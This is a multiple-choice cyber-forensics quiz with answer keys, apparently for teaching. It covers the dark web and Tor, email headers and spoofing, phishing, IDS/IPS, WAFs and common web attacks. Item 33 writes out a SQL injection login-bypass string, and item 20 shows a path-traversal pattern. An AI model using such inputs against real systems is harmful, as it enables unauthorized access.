1Which part of the internet is not indexed by standard search engines and requires specific software, configurations, or authorization to access?
A.Surface Web
B.Dark Web
C.Transparent Web
D.Deep Web
Correct Answer: Dark Web
Explanation:
The Dark Web is a subset of the Deep Web that is intentionally hidden and requires specific software like Tor or I2P to access.
Incorrect! Try again.
2What is the primary routing mechanism used by the Tor network to maintain user anonymity?
A.Onion Routing
B.Tomato Routing
C.Garlic Routing
D.Packet Switching
Correct Answer: Onion Routing
Explanation:
Tor uses Onion Routing, where data is encapsulated in layers of encryption, peeled off one by one by relay nodes.
Incorrect! Try again.
3Which Top-Level Domain (TLD) is specifically associated with sites hosted on the Tor network?
A..onion
B..exe
C..com
D..tor
Correct Answer: .onion
Explanation:
The .onion TLD denotes an anonymous hidden service reachable via the Tor network.
Incorrect! Try again.
4In the context of email basics, what does SMTP stand for?
A.Standard Mail Text Protocol
B.Secure Mail Transmission Protocol
C.System Mail Transfer Protocol
D.Simple Mail Transfer Protocol
Correct Answer: Simple Mail Transfer Protocol
Explanation:
SMTP (Simple Mail Transfer Protocol) is the standard protocol for sending emails across the Internet.
Incorrect! Try again.
5Which protocol is primarily used by email clients to retrieve messages from a mail server?
A.FTP
B.SNMP
C.IMAP
D.SMTP
Correct Answer: IMAP
Explanation:
IMAP (Internet Message Access Protocol) is used to retrieve emails from a server, allowing management of emails directly on the server.
Incorrect! Try again.
6What is the most critical section of an email for forensic analysis when tracing the origin of a message?
A.The Subject Line
B.The Email Header
C.The Signature Block
D.The Email Body
Correct Answer: The Email Header
Explanation:
The Email Header contains routing information, IP addresses of sending servers, and timestamps essential for tracing the origin.
Incorrect! Try again.
7Which specific field in an email header usually reveals the IP address of the sender?
A.Return-Path
B.To
C.From
D.Received
Correct Answer: Received
Explanation:
The 'Received' fields trace the path of the email from sender to recipient, often containing the originating IP address.
Incorrect! Try again.
8What is the term for an email attack where the sender manipulates the address to make it appear as if it came from a trusted source?
A.Email Spiking
B.Email Bombing
C.Email Spoofing
D.Email Sniffing
Correct Answer: Email Spoofing
Explanation:
Email spoofing involves altering the email header to make the message appear to come from a legitimate or known source.
Incorrect! Try again.
9In a phishing investigation, what is 'Typosquatting'?
A.Deleting email logs
B.Encrypting the email body
C.Using all caps in the subject line
D.Registering a domain name extremely similar to a legitimate one
Correct Answer: Registering a domain name extremely similar to a legitimate one
Explanation:
Typosquatting relies on mistakes such as typos made by internet users when inputting a website address into a web browser.
Incorrect! Try again.
10Which type of phishing attack specifically targets high-profile executives like CEOs or CFOs?
A.Whaling
B.Spear Phishing
C.Smishing
D.Vishing
Correct Answer: Whaling
Explanation:
Whaling is a specific form of spear phishing aimed at high-value targets, often to steal sensitive data or initiate fraudulent wire transfers.
Incorrect! Try again.
11What is the primary function of an Intrusion Detection System (IDS)?
A.To act as a web server
B.To encrypt network data
C.To monitor network traffic for suspicious activity
D.To block all network traffic
Correct Answer: To monitor network traffic for suspicious activity
Explanation:
An IDS monitors network traffic for suspicious activity and issues alerts when such activity is discovered.
Incorrect! Try again.
12How does an Intrusion Prevention System (IPS) differ mainly from an IDS?
A.IPS cannot detect viruses
B.IPS takes active action to stop the threat
C.IPS is slower
D.IPS only logs data
Correct Answer: IPS takes active action to stop the threat
Explanation:
Unlike an IDS which primarily alerts, an IPS sits inline with traffic and can actively block or drop malicious packets.
Incorrect! Try again.
13Which type of IDS detection method relies on a database of known attack patterns?
A.Signature-based detection
B.Heuristic detection
C.Behavior-based detection
D.Anomaly-based detection
Correct Answer: Signature-based detection
Explanation:
Signature-based detection compares network traffic against a database of known threat signatures.
Incorrect! Try again.
14What is a 'False Positive' in the context of IDS/IPS?
A.A legitimate activity flagged as malicious
B.A successful virus removal
C.A system crash
D.A malicious attack that is missed
Correct Answer: A legitimate activity flagged as malicious
Explanation:
A False Positive occurs when the system incorrectly identifies benign traffic or behavior as a threat.
Incorrect! Try again.
15What does WAF stand for in web security?
A.Windows Authentication File
B.Wide Area Firewall
C.Web Application Firewall
D.Wireless Access Firewall
Correct Answer: Web Application Firewall
Explanation:
WAF stands for Web Application Firewall, designed to protect web applications by filtering and monitoring HTTP traffic.
Incorrect! Try again.
16At which layer of the OSI model does a Web Application Firewall (WAF) primarily operate?
A.Layer 4 (Transport)
B.Layer 7 (Application)
C.Layer 3 (Network)
D.Layer 2 (Data Link)
Correct Answer: Layer 7 (Application)
Explanation:
WAFs operate at Layer 7 to inspect the content of web traffic (HTTP/HTTPS) and block application-specific attacks.
Incorrect! Try again.
17Which attack involves injecting malicious SQL queries into input fields to manipulate a database?
A.SQL Injection
B.Cross-Site Scripting (XSS)
C.Buffer Overflow
D.CSRF
Correct Answer: SQL Injection
Explanation:
SQL Injection (SQLi) allows attackers to interfere with the queries an application makes to its database.
Incorrect! Try again.
18What type of web attack involves injecting malicious scripts into trusted websites viewed by other users?
A.Cross-Site Scripting (XSS)
B.Directory Traversal
C.SQL Injection
D.Brute Force
Correct Answer: Cross-Site Scripting (XSS)
Explanation:
XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users.
Incorrect! Try again.
19Which attack forces an end user to execute unwanted actions on a web application in which they are currently authenticated?
A.Cross-Site Request Forgery (CSRF)
B.Packet Sniffing
C.Man-in-the-Middle
D.SQL Injection
Correct Answer: Cross-Site Request Forgery (CSRF)
Explanation:
CSRF tricks the victim into submitting a malicious request used to perform actions on their behalf without their knowledge.
Incorrect! Try again.
20What is a 'Directory Traversal' attack?
A.Injecting SQL commands
B.Overloading the server with requests
C.Accessing restricted directories and files by manipulating file paths
D.Stealing cookies
Correct Answer: Accessing restricted directories and files by manipulating file paths
Explanation:
Directory Traversal (or Path Traversal) aims to access files and directories that are stored outside the web root folder (e.g., using ../../).
Incorrect! Try again.
21In Email Forensics, what is the role of an MTA (Mail Transfer Agent)?
A.To display emails to the user
B.To route and transfer emails between servers
C.To attach files
D.To read emails
Correct Answer: To route and transfer emails between servers
Explanation:
The MTA involves the software on the server responsible for transferring emails from one computer to another.
Incorrect! Try again.
22What is the standard port number for SMTP traffic?
A.25
B.21
C.443
D.80
Correct Answer: 25
Explanation:
Port 25 is the default standard port for Simple Mail Transfer Protocol (SMTP).
Incorrect! Try again.
23Which component of an IDS is responsible for collecting data from the network?
A.Sensor
B.Database
C.Analyzer
D.Console
Correct Answer: Sensor
Explanation:
Sensors are placed at key points in the network to collect traffic data for analysis by the IDS.
Incorrect! Try again.
24What is the main disadvantage of Anomaly-based IDS?
A.It cannot detect new attacks
B.It requires virus signatures
C.It is only for wireless networks
D.It has a high rate of false positives
Correct Answer: It has a high rate of false positives
Explanation:
Because anomaly-based systems define 'normal' behavior, any deviation (even legitimate new behavior) can trigger a false positive.
Incorrect! Try again.
25Which web attack aims to make a machine or network resource unavailable to its intended users?
A.Privilege Escalation
B.SQL Injection
C.DoS (Denial of Service)
D.Phishing
Correct Answer: DoS (Denial of Service)
Explanation:
A DoS attack seeks to shut down a machine or network, making it inaccessible to its intended users.
Incorrect! Try again.
26What does a 'Logic Bomb' generally refer to in cyber crime?
A.Malicious code set to execute when specific conditions are met
B.A type of firewall
C.A physical explosive
D.A failed hacking attempt
Correct Answer: Malicious code set to execute when specific conditions are met
Explanation:
A logic bomb is a piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met.
Incorrect! Try again.
27Which of the following is a tool often used for network intrusion detection?
A.Excel
B.Word
C.Photoshop
D.Snort
Correct Answer: Snort
Explanation:
Snort is a popular open-source network intrusion prevention system and intrusion detection system.
Incorrect! Try again.
28In the context of the Dark Web, what is an 'Exit Node'?
A.The first server you connect to
B.The server where traffic leaves the Tor network to reach the open internet
C.An offline server
D.A firewall rule
Correct Answer: The server where traffic leaves the Tor network to reach the open internet
Explanation:
The exit node is the final relay in a Tor circuit where the traffic is decrypted and sent to the final destination on the public internet.
Incorrect! Try again.
29What is the first step in an email crime investigation?
A.Deleting the spam
B.Seizing the suspect's computer
C.Acquiring and preserving the email evidence
D.Arresting the suspect
Correct Answer: Acquiring and preserving the email evidence
Explanation:
The immediate priority is to secure the evidence (the email and its headers) in a forensically sound manner to prevent alteration.
Incorrect! Try again.
30Which email protocol leaves the original email on the server by default?
A.HTTP
B.FTP
C.IMAP
D.POP3
Correct Answer: IMAP
Explanation:
IMAP synchronizes with the server, leaving the original message on the server, whereas POP3 often downloads and deletes it.
Incorrect! Try again.
31What is 'Session Hijacking'?
A.Breaking a password
B.Stealing a laptop
C.Phishing for credit cards
D.Taking over a user's active web session by stealing the session ID
Correct Answer: Taking over a user's active web session by stealing the session ID
Explanation:
Session hijacking involves exploiting a valid computer session to gain unauthorized access to information or services.
Incorrect! Try again.
32Which of the following is a passive security device?
A.IPS
B.Firewall
C.IDS
D.Proxy Server
Correct Answer: IDS
Explanation:
An IDS is typically passive; it monitors and alerts but does not sit inline to block traffic automatically like a Firewall or IPS.
Incorrect! Try again.
33In a SQL injection attack, what does the input ' OR '1'='1 typically achieve?
A.It deletes the database
B.It shuts down the server
C.It evaluates to True, bypassing authentication
D.It encrypts the data
Correct Answer: It evaluates to True, bypassing authentication
Explanation:
This is a tautology (a statement that is always true) used to trick the database into returning all records or bypassing login checks.
Incorrect! Try again.
34Which type of XSS attack stores the malicious script permanently on the target server (e.g., in a forum post)?
A.Local XSS
B.Reflected XSS
C.Stored (Persistent) XSS
D.DOM-based XSS
Correct Answer: Stored (Persistent) XSS
Explanation:
Stored XSS occurs when the malicious script is saved on the server (e.g., in a database) and served to users who access that content.
Incorrect! Try again.
35What is the purpose of 'DKIM' in email security?
A.To verify that an email message was not forged or altered
B.To archive emails
C.To encrypt the email body
D.To block spam
Correct Answer: To verify that an email message was not forged or altered
Explanation:
DomainKeys Identified Mail (DKIM) provides an encryption key and digital signature that verifies that an email message was not forged or altered.
Incorrect! Try again.
36A 'Zero-day' attack refers to:
A.An attack that happens at midnight
B.An attack on a closed network
C.An attack that takes zero seconds
D.An attack exploiting a vulnerability unknown to the software vendor
Correct Answer: An attack exploiting a vulnerability unknown to the software vendor
Explanation:
A Zero-day exploit targets a vulnerability that the developers are unaware of and have had 'zero days' to fix.
Incorrect! Try again.
37Which part of the email header is easiest to spoof?
A.Received-By IP
B.From address
C.Message-ID
D.DKIM Signature
Correct Answer: From address
Explanation:
The 'From' field is easily manipulated by the sender's mail client, unlike the 'Received' headers added by intermediate servers.
Incorrect! Try again.
38What does a Host-based IDS (HIDS) monitor?
A.Traffic on the entire subnet
B.Traffic at the ISP level
C.Wireless signals only
D.Activity and logs on a specific individual device
Correct Answer: Activity and logs on a specific individual device
Explanation:
HIDS operates on a specific host or device, monitoring system logs, file modifications, and local activity.
Incorrect! Try again.
39What is 'Bitcoin's' primary role in the Dark Web?
A.It is a common method for anonymous payment
B.It acts as a firewall
C.It is the software used to browse
D.It is the hosting provider
Correct Answer: It is a common method for anonymous payment
Explanation:
Cryptocurrencies like Bitcoin are used on the Dark Web to facilitate pseudo-anonymous transactions for illegal goods and services.
Incorrect! Try again.
40Which attack involves an attacker intercepting communication between two parties?
A.DDoS
B.Man-in-the-Middle (MITM)
C.Logic Bomb
D.Phishing
Correct Answer: Man-in-the-Middle (MITM)
Explanation:
MITM attacks involve an attacker secretly relaying and possibly altering the communications between two parties who believe they are communicating directly.
Incorrect! Try again.
41What is 'Business Email Compromise' (BEC)?
A.Spam advertising
B.Email server maintenance
C.A virus that deletes emails
D.A scam compromising legitimate business email accounts to conduct unauthorized transfers
Correct Answer: A scam compromising legitimate business email accounts to conduct unauthorized transfers
Explanation:
BEC is a sophisticated scam targeting businesses working with foreign suppliers and/or businesses that perform wire transfer payments.
Incorrect! Try again.
42The 'Deep Web' includes:
A.Anything not indexed by search engines (e.g., medical records, academic databases)
B.Only social media
C.Only illegal content
D.Google search results
Correct Answer: Anything not indexed by search engines (e.g., medical records, academic databases)
Explanation:
The Deep Web refers to parts of the World Wide Web whose contents are not indexed by standard web search-engines, including legitimate databases and private networks.
Incorrect! Try again.
43Which mechanism in a WAF allows only pre-approved traffic and blocks everything else?
A.Blacklisting
B.Whitelisting
C.Redlisting
D.Greylisting
Correct Answer: Whitelisting
Explanation:
Whitelisting (positive security model) denies all traffic by default and only allows specific, known-good traffic.
Incorrect! Try again.
44In web attacks, what is a 'Brute Force' attack?
A.Sending a virus via email
B.Guessing passwords by trying every possible combination
C.Injecting SQL code
D.Physically breaking the server
Correct Answer: Guessing passwords by trying every possible combination
Explanation:
Brute force attacks involve an automated system attempting every possible combination of characters to discover a password.
Incorrect! Try again.
45What distinguishes a Distributed Denial of Service (DDoS) from a standard DoS?
A.DDoS is slower
B.DDoS uses a single attacker machine
C.DDoS uses multiple compromised systems (botnet) to attack
D.DDoS targets emails only
Correct Answer: DDoS uses multiple compromised systems (botnet) to attack
Explanation:
DDoS utilizes a network of compromised machines (bots) to flood the target, making it harder to block than a single-source DoS.
Incorrect! Try again.
46Which file on a web server determines which parts of the site crawlers are permitted to access?
A.config.php
B.style.css
C.index.html
D.robots.txt
Correct Answer: robots.txt
Explanation:
robots.txt is a standard used by websites to communicate with web crawlers and other web robots about which areas of the website should not be processed or scanned.
Incorrect! Try again.
47What is the primary utility of 'Packet Sniffing' in forensics?
A.To clean viruses
B.To capture and analyze data traffic moving across a network
C.To edit files remotely
D.To encrypt hard drives
Correct Answer: To capture and analyze data traffic moving across a network
Explanation:
Packet sniffing involves intercepting and logging traffic that passes over a digital network, useful for analyzing attacks or evidence.
Incorrect! Try again.
48In email forensics, 'MUA' stands for:
A.Mail Unified Access
B.Mail Upload Agent
C.Mail User Agent
D.Master User Authorization
Correct Answer: Mail User Agent
Explanation:
MUA (Mail User Agent) is the email client software (like Outlook or Thunderbird) used by the user to compose and read emails.
Incorrect! Try again.
49Which vulnerability allows an attacker to include a file, usually exploiting a 'dynamic file inclusion' mechanism implemented in the target application?
A.Local File Inclusion (LFI)
B.Brute Force
C.Syn Flood
D.Dictionary Attack
Correct Answer: Local File Inclusion (LFI)
Explanation:
LFI allows an attacker to include files on a server through the web browser, potentially leading to information disclosure or code execution.
Incorrect! Try again.
50The 'Silk Road' was a famous marketplace located on:
A.The Dark Web
B.The Surface Web
C.A private LAN
D.Facebook
Correct Answer: The Dark Web
Explanation:
Silk Road was a notorious online black market on the Dark Web, operated via Tor, known for selling illegal drugs.